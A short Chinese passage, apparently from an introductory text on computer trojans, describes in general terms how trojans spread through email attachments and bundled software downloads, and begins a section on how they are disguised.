2、传播木马(1)传播方式木马的传播方式主要有两种:一种是通过E-MAIL,控制端将木马程序以附件的形式夹在邮件中发送出去,收信人只要打开附件系统就会感染木马;另一种是软件下载,一些非正规的网站以提供软件下载为名义,将木马捆绑在软件安装程序上,下载后,只要一运行这些程序,木马就会自动安装。
(2)伪装方式鉴于木马的危害性,很多人对木马知识还是有一定了解的,这对木马的传播起了一定的抑制作用,这是木马设计者所不愿见到的。